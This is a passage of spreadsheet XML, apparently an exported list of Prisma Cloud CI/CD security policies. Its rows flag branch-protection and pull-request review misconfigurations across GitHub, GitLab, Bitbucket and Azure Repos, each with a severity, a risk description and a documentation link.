        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J249" t="inlineStr">
        <is>
          <t>CI/CD:Flow Control Mechanisms:</t>
        </is>
      </c>
      <c r="K249" t="inlineStr">
        <is>
          <t>Approvals for pull requests on the default branch in GitHub are not revoked when new commits are pushed</t>
        </is>
      </c>
      <c r="L249" t="inlineStr"/>
      <c r="M249" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N249" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O249" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P249" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q249" t="inlineStr"/>
      <c r="R249" t="inlineStr"/>
      <c r="S249" t="inlineStr"/>
      <c r="T249" t="b">
        <v>0</v>
      </c>
      <c r="U249" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V249" t="inlineStr">
        <is>
          <t>CI/CD:Flow Control Mechanisms:</t>
        </is>
      </c>
      <c r="W249" t="inlineStr">
        <is>
          <t>When a pull request is approved, it means that the code changes have been reviewed and can be merged into the target branch. However, if new commits are added to the request after it has been approved, those commits are not automatically required to be reviewed again. This can lead to bypassing a branch protection rule by merging unreviewed commits into the default branch, potentially introducing malicious code.</t>
        </is>
      </c>
      <c r="X249" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/github-cicd-pipeline-policies/gh-pr-approvals-notrevoked-newcommits</t>
        </is>
      </c>
      <c r="Y249" t="inlineStr"/>
      <c r="Z249" t="inlineStr">
        <is>
          <t>{"category":"Flow Control Mechanisms","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA249" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB249" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC249" t="inlineStr"/>
      <c r="AD249" t="b">
        <v>1</v>
      </c>
      <c r="AE249" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF249" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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 t="inlineStr">
        <is>
          <t>30496982-7940-47c0-8b41-145a38b6c159</t>
        </is>
      </c>
      <c r="AI249" t="inlineStr"/>
      <c r="AJ249" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK249" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="250">
      <c r="A250" t="inlineStr"/>
      <c r="B250" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C250" s="2" t="inlineStr"/>
      <c r="D250" t="inlineStr"/>
      <c r="E250" t="inlineStr"/>
      <c r="F250" t="inlineStr"/>
      <c r="G250" t="b">
        <v>1</v>
      </c>
      <c r="H2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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J250" t="inlineStr">
        <is>
          <t>CI/CD:Flow Control Mechanisms:</t>
        </is>
      </c>
      <c r="K250" t="inlineStr">
        <is>
          <t>Actively used GitLab repository lacks branch protection rules</t>
        </is>
      </c>
      <c r="L250" t="inlineStr"/>
      <c r="M250" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N250" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O250" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P250" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q250" t="inlineStr"/>
      <c r="R250" t="inlineStr"/>
      <c r="S250" t="inlineStr"/>
      <c r="T250" t="b">
        <v>0</v>
      </c>
      <c r="U250" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V250" t="inlineStr">
        <is>
          <t>CI/CD:Flow Control Mechanisms:</t>
        </is>
      </c>
      <c r="W250" t="inlineStr">
        <is>
          <t>An actively used repository does not have any protected branch settings configured. Protected branch settings are recommended to enforce stronger controls around the conditions that enable pushing code to important branches within a sensitive repo. Protected branch settings define whether collaborators can delete or force pushing to the branch. They also set requirements for any pushes to the branch, such as passing status checks or a linear commit history. Lack of protected branch settings can allow collaborators to inadvertently/intentionally push code, which introduces security risks to production. An actively used repository has at least two contributors, over 50 commits, and was updated in the last 90 days.</t>
        </is>
      </c>
      <c r="X250" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/gitlab-cicd-pipeline-policies/gl-active-repo-lacks-bprules</t>
        </is>
      </c>
      <c r="Y250" t="inlineStr"/>
      <c r="Z250" t="inlineStr">
        <is>
          <t>{"category":"Flow Control Mechanisms","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA250" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB250" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC250" t="inlineStr"/>
      <c r="AD250" t="b">
        <v>1</v>
      </c>
      <c r="AE250" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF250" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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 t="inlineStr">
        <is>
          <t>5dd19a36-19f6-4c60-aa64-ff6f41f49d9b</t>
        </is>
      </c>
      <c r="AI250" t="inlineStr"/>
      <c r="AJ250" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK250" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="251">
      <c r="A251" t="inlineStr"/>
      <c r="B251" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C251" s="2" t="inlineStr"/>
      <c r="D251" t="inlineStr"/>
      <c r="E251" t="inlineStr"/>
      <c r="F251" t="inlineStr"/>
      <c r="G251" t="b">
        <v>1</v>
      </c>
      <c r="H2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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J251" t="inlineStr">
        <is>
          <t>CI/CD:Flow Control Mechanisms:</t>
        </is>
      </c>
      <c r="K251" t="inlineStr">
        <is>
          <t>GitLab branch protection rule allows push to default branch</t>
        </is>
      </c>
      <c r="L251" t="inlineStr"/>
      <c r="M251" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N251" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O251" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P251" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q251" t="inlineStr"/>
      <c r="R251" t="inlineStr"/>
      <c r="S251" t="inlineStr"/>
      <c r="T251" t="b">
        <v>0</v>
      </c>
      <c r="U251" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V251" t="inlineStr">
        <is>
          <t>CI/CD:Flow Control Mechanisms:</t>
        </is>
      </c>
      <c r="W251" t="inlineStr">
        <is>
          <t>A user with write access can push malicious code to the default branch of an actively used repository*, without having to go through an approval cycle. This code is likely to flow through the pipeline to production systems. * An actively used repository is defined as having at least two contributors, over 50 commits, and has been updated in the last 90 days.</t>
        </is>
      </c>
      <c r="X251" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/gitlab-cicd-pipeline-policies/gl-bprule-allows-push-db</t>
        </is>
      </c>
      <c r="Y251" t="inlineStr"/>
      <c r="Z251" t="inlineStr">
        <is>
          <t>{"category":"Flow Control Mechanisms","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA251" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB251" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC251" t="inlineStr"/>
      <c r="AD251" t="b">
        <v>1</v>
      </c>
      <c r="AE251" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF251" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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1" t="inlineStr">
        <is>
          <t>da41edc6-d61e-4c95-ba85-b67a6489ff1f</t>
        </is>
      </c>
      <c r="AI251" t="inlineStr"/>
      <c r="AJ251" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK251" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="252">
      <c r="A252" t="inlineStr"/>
      <c r="B252" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C252" s="2" t="inlineStr"/>
      <c r="D252" t="inlineStr"/>
      <c r="E252" t="inlineStr"/>
      <c r="F252" t="inlineStr"/>
      <c r="G252" t="b">
        <v>1</v>
      </c>
      <c r="H2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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J252" t="inlineStr">
        <is>
          <t>CI/CD:Flow Control Mechanisms:</t>
        </is>
      </c>
      <c r="K252" t="inlineStr">
        <is>
          <t>GitHub branch protection not enforced on administrators</t>
        </is>
      </c>
      <c r="L252" t="inlineStr"/>
      <c r="M252" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N252" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O252" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P252" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q252" t="inlineStr"/>
      <c r="R252" t="inlineStr"/>
      <c r="S252" t="inlineStr"/>
      <c r="T252" t="b">
        <v>0</v>
      </c>
      <c r="U252" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V252" t="inlineStr">
        <is>
          <t>CI/CD:Flow Control Mechanisms:</t>
        </is>
      </c>
      <c r="W252" t="inlineStr">
        <is>
          <t>Branch protection rules are not enforced on administrators in an actively used repository. These are a mechanism to enforce a set of requirements before code can be pushed to a repository branch. These rules can apply to organization and repository administrators or to exclude them. Despite the fact that administrators can modify branch protection rules, it is recommended to apply it to them, to assist with restricting push of unreviewed code to a branch. An actively used repository has at least two contributors, over 50 commits, and was updated in the last 90 days.</t>
        </is>
      </c>
      <c r="X252" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/github-cicd-pipeline-policies/gh-bp-notenforced-onadmin</t>
        </is>
      </c>
      <c r="Y252" t="inlineStr"/>
      <c r="Z252" t="inlineStr">
        <is>
          <t>{"category":"Flow Control Mechanisms","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA252" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB252" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC252" t="inlineStr"/>
      <c r="AD252" t="b">
        <v>1</v>
      </c>
      <c r="AE252" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF252" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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2" t="inlineStr">
        <is>
          <t>8284c802-c8b5-48eb-a911-4731b675b0e1</t>
        </is>
      </c>
      <c r="AI252" t="inlineStr"/>
      <c r="AJ252" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK252" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="253">
      <c r="A253" t="inlineStr"/>
      <c r="B253" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C253" s="2" t="inlineStr"/>
      <c r="D253" t="inlineStr"/>
      <c r="E253" t="inlineStr"/>
      <c r="F253" t="inlineStr"/>
      <c r="G253" t="b">
        <v>1</v>
      </c>
      <c r="H2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3" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J253" t="inlineStr">
        <is>
          <t>CI/CD:Flow Control Mechanisms:</t>
        </is>
      </c>
      <c r="K253" t="inlineStr">
        <is>
          <t>Pull request reviews are not required in GitHub before merging to the default branch</t>
        </is>
      </c>
      <c r="L253" t="inlineStr"/>
      <c r="M253" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N253" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O253" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P253" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q253" t="inlineStr"/>
      <c r="R253" t="inlineStr"/>
      <c r="S253" t="inlineStr"/>
      <c r="T253" t="b">
        <v>0</v>
      </c>
      <c r="U253" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V253" t="inlineStr">
        <is>
          <t>CI/CD:Flow Control Mechanisms:</t>
        </is>
      </c>
      <c r="W253" t="inlineStr">
        <is>
          <t>User accounts granted with Write permissions on an actively used repository can directly push code to the default branch, not required for pull request reviews before code is merged. Attackers compromising such a user account can directly push code to the default branch, which is likely to flow through the pipeline and be used in production systems. An actively used repository has at least two contributors, over 50 commits, and was updated in the last 90 days.</t>
        </is>
      </c>
      <c r="X253" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/github-cicd-pipeline-policies/gh-pr-reviews-not-required-merge-db</t>
        </is>
      </c>
      <c r="Y253" t="inlineStr"/>
      <c r="Z253" t="inlineStr">
        <is>
          <t>{"category":"Flow Control Mechanisms","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA253" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB253" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC253" t="inlineStr"/>
      <c r="AD253" t="b">
        <v>1</v>
      </c>
      <c r="AE253" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF253" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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3" t="inlineStr">
        <is>
          <t>68fb2614-60c8-48aa-9aa1-4a0c7c02db44</t>
        </is>
      </c>
      <c r="AI253" t="inlineStr"/>
      <c r="AJ253" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK253" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="254">
      <c r="A254" t="inlineStr"/>
      <c r="B254" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C254" s="2" t="inlineStr"/>
      <c r="D254" t="inlineStr"/>
      <c r="E254" t="inlineStr"/>
      <c r="F254" t="inlineStr"/>
      <c r="G254" t="b">
        <v>1</v>
      </c>
      <c r="H2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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J254" t="inlineStr">
        <is>
          <t>CI/CD:Flow Control Mechanisms:</t>
        </is>
      </c>
      <c r="K254" t="inlineStr">
        <is>
          <t>BitBucket branch protection rule allows push to default branch</t>
        </is>
      </c>
      <c r="L254" t="inlineStr"/>
      <c r="M254" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N254" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O254" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P254" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q254" t="inlineStr"/>
      <c r="R254" t="inlineStr"/>
      <c r="S254" t="inlineStr"/>
      <c r="T254" t="b">
        <v>0</v>
      </c>
      <c r="U254" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V254" t="inlineStr">
        <is>
          <t>CI/CD:Flow Control Mechanisms:</t>
        </is>
      </c>
      <c r="W254" t="inlineStr">
        <is>
          <t>A user with write access can push malicious code to the default branch of an actively used repository*, without having to go through an approval cycle. This code is likely to flow through the pipeline to production systems. * An actively used repository is defined as having at least two contributors, over 50 commits, and has been updated in the last 90 days.</t>
        </is>
      </c>
      <c r="X254" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/bitbucket-cicd-pipeline-policies/bb-bprule-allows-push-db</t>
        </is>
      </c>
      <c r="Y254" t="inlineStr"/>
      <c r="Z254" t="inlineStr">
        <is>
          <t>{"category":"Flow Control Mechanisms","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA254" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB254" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC254" t="inlineStr"/>
      <c r="AD254" t="b">
        <v>1</v>
      </c>
      <c r="AE254" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF254" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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4" t="inlineStr">
        <is>
          <t>71f95641-9362-4a24-80c5-f8621c28a1df</t>
        </is>
      </c>
      <c r="AI254" t="inlineStr"/>
      <c r="AJ254" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK254" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="255">
      <c r="A255" t="inlineStr"/>
      <c r="B255" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C255" s="2" t="inlineStr"/>
      <c r="D255" t="inlineStr"/>
      <c r="E255" t="inlineStr"/>
      <c r="F255" t="inlineStr"/>
      <c r="G255" t="b">
        <v>1</v>
      </c>
      <c r="H2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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J255" t="inlineStr">
        <is>
          <t>CI/CD:Flow Control Mechanisms:</t>
        </is>
      </c>
      <c r="K255" t="inlineStr">
        <is>
          <t>Azure repository does not dismiss pull request approvals on the default branch when new commits are pushed</t>
        </is>
      </c>
      <c r="L255" t="inlineStr"/>
      <c r="M255" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N255" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O255" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P255" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q255" t="inlineStr"/>
      <c r="R255" t="inlineStr"/>
      <c r="S255" t="inlineStr"/>
      <c r="T255" t="b">
        <v>0</v>
      </c>
      <c r="U255" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V255" t="inlineStr">
        <is>
          <t>CI/CD:Flow Control Mechanisms:</t>
        </is>
      </c>
      <c r="W255" t="inlineStr">
        <is>
          <t>When a pull request is approved, it means that the code changes have been reviewed and can be merged into the target branch. However, new commits added to an existing pull request after it has been approved do not automatically require review. This can result in the bypassing of branch protection rules, allowing the merging of unreviewed commits into the default branch, potentially introducing malicious code that could be used to steal secrets, establish backdoors and affect production.</t>
        </is>
      </c>
      <c r="X255" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/azure-repo-cicd-pipeline-policies/azure-repo-not-dismiss-pr-approval</t>
        </is>
      </c>
      <c r="Y255" t="inlineStr"/>
      <c r="Z255" t="inlineStr">
        <is>
          <t>{"category":"Flow Control Mechanisms","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA255" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB255" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC255" t="inlineStr"/>
      <c r="AD255" t="b">
        <v>1</v>
      </c>
      <c r="AE255" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF255" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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5" t="inlineStr">
        <is>
          <t>413263f7-a854-4b26-878b-ccb1aafc3f93</t>
        </is>
      </c>
      <c r="AI255" t="inlineStr"/>
      <c r="AJ255" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK255" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="256">
      <c r="A256" t="inlineStr"/>
      <c r="B256" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C256" s="2" t="inlineStr"/>
      <c r="D256" t="inlineStr"/>
      <c r="E256" t="inlineStr"/>
      <c r="F256" t="inlineStr"/>
      <c r="G256" t="b">
        <v>1</v>
      </c>
      <c r="H2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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J256" t="inlineStr">
        <is>
          <t>CI/CD:Flow Control Mechanisms:</t>
        </is>
      </c>
      <c r="K256" t="inlineStr">
        <is>
          <t>Code owners reviews are not required in GitHub before merging to the default branch</t>
        </is>
      </c>
      <c r="L256" t="inlineStr"/>
      <c r="M256" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N256" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O256" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P256" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q256" t="inlineStr"/>
      <c r="R256" t="inlineStr"/>
      <c r="S256" t="inlineStr"/>
      <c r="T256" t="b">
        <v>0</v>
      </c>
      <c r="U256" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V256" t="inlineStr">
        <is>
          <t>CI/CD:Flow Control Mechanisms:</t>
        </is>
      </c>
      <c r="W256" t="inlineStr">
        <is>
          <t>An actively used repository* does not require code owners reviews before merging to the default branch. The 'Code owners' feature enables repository owners to assign responsible individuals or teams for reviewing and approving changes to critical files or directories, ensuring that proposed modifications are assessed by knowledgeable developers. This helps reduce the risk of introducing vulnerabilities into the codebase by attackers or mistakes.</t>
        </is>
      </c>
      <c r="X256" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/github-cicd-pipeline-policies/gh-code-owners-review-not-required-tomerge</t>
        </is>
      </c>
      <c r="Y256" t="inlineStr"/>
      <c r="Z256" t="inlineStr">
        <is>
          <t>{"category":"Flow Control Mechanisms","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA256" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB256" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC256" t="inlineStr"/>
      <c r="AD256" t="b">
        <v>1</v>
      </c>
      <c r="AE256" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF256" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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6" t="inlineStr">
        <is>
          <t>673480f9-613d-4a7a-af4f-e0f223e81334</t>
        </is>
      </c>
      <c r="AI256" t="inlineStr"/>
      <c r="AJ256" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK256" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="257">
      <c r="A257" t="inlineStr"/>
      <c r="B257" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C257" s="2" t="inlineStr"/>
      <c r="D257" t="inlineStr"/>
      <c r="E257" t="inlineStr"/>
      <c r="F257" t="inlineStr"/>
      <c r="G257" t="b">
        <v>1</v>
      </c>
      <c r="H2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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J257" t="inlineStr">
        <is>
          <t>CI/CD:Flow Control Mechanisms:</t>
        </is>
      </c>
      <c r="K257" t="inlineStr">
        <is>
          <t>Code Owners Removed in GitHub repository</t>
        </is>
      </c>
      <c r="L257" t="inlineStr"/>
      <c r="M257" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N257" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O257" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P257" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q257" t="inlineStr"/>
      <c r="R257" t="inlineStr"/>
      <c r="S257" t="inlineStr"/>
      <c r="T257" t="b">
        <v>0</v>
      </c>
      <c r="U257" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V257" t="inlineStr">
        <is>
          <t>CI/CD:Flow Control Mechanisms:</t>
        </is>
      </c>
      <c r="W257" t="inlineStr">
        <is>
          <t>CODEOWNERS files can be used to define the entity responsible for the code. A branch protection rule can be set to enforce review and approval by code owners on code changes. Removing the CODEOWNERS file renders the branch protection rule, which requires owners' approval to code changes, redundant.</t>
        </is>
      </c>
      <c r="X257" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/github-cicd-pipeline-policies/gh-owner-rem-repo</t>
        </is>
      </c>
      <c r="Y257" t="inlineStr"/>
      <c r="Z257" t="inlineStr">
        <is>
          <t>{"category":"Flow Control Mechanisms","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA257" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB257" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC257" t="inlineStr"/>
      <c r="AD257" t="b">
        <v>1</v>
      </c>
      <c r="AE257" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF257" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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7" t="inlineStr">
        <is>
          <t>9a1369b3-4ad5-4b03-aa2a-019b32db466a</t>
        </is>
      </c>
      <c r="AI257" t="inlineStr"/>
      <c r="AJ257" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK257" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="258">
      <c r="A258" t="inlineStr"/>
      <c r="B258" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C258" s="2" t="inlineStr"/>
      <c r="D258" t="inlineStr"/>
      <c r="E258" t="inlineStr"/>
      <c r="F258" t="inlineStr"/>
      <c r="G258" t="b">
        <v>1</v>
      </c>
      <c r="H2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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J258" t="inlineStr">
        <is>
          <t>CI/CD:Flow Control Mechanisms:</t>
        </is>
      </c>
      <c r="K258" t="inlineStr">
        <is>
          <t>Required reviews can be bypassed using GitHub Actions</t>
        </is>
      </c>
      <c r="L258" t="inlineStr"/>
      <c r="M258" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N258" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O258" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P258" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q258" t="inlineStr"/>
      <c r="R258" t="inlineStr"/>
      <c r="S258" t="inlineStr"/>
      <c r="T258" t="b">
        <v>0</v>
      </c>
      <c r="U258" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V258" t="inlineStr">
        <is>
          <t>CI/CD:Flow Control Mechanisms:</t>
        </is>
      </c>
      <c r="W258" t="inlineStr">
        <is>
          <t>Push of unreviewed code to sensitive repository branches can be restricted by requiring users to create pull requests and receive approvals from other organization members before merging the code to the target branch. With GitHub Actions enabled, any user with Write permissions on a repository can create and run GitHub Actions workflows, and grant the workflow Write permissions on the repository. The author of the workflow can then leverage this to instruct the Github Actions workflow to approve their pull request. This vulnerability enables the author to approve their own pull request and merge unreviewed code to the target branch, effectively bypassing the multiple reviews security control.</t>
        </is>
      </c>
      <c r="X258" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/github-cicd-pipeline-policies/ghact-req-rev-bypassed</t>
        </is>
      </c>
      <c r="Y258" t="inlineStr"/>
      <c r="Z258" t="inlineStr">
        <is>
          <t>{"category":"Flow Control Mechanisms","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA258" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB258" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC258" t="inlineStr"/>
      <c r="AD258" t="b">
        <v>1</v>
      </c>
      <c r="AE258" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF258" t="inlineStr">
        <is>
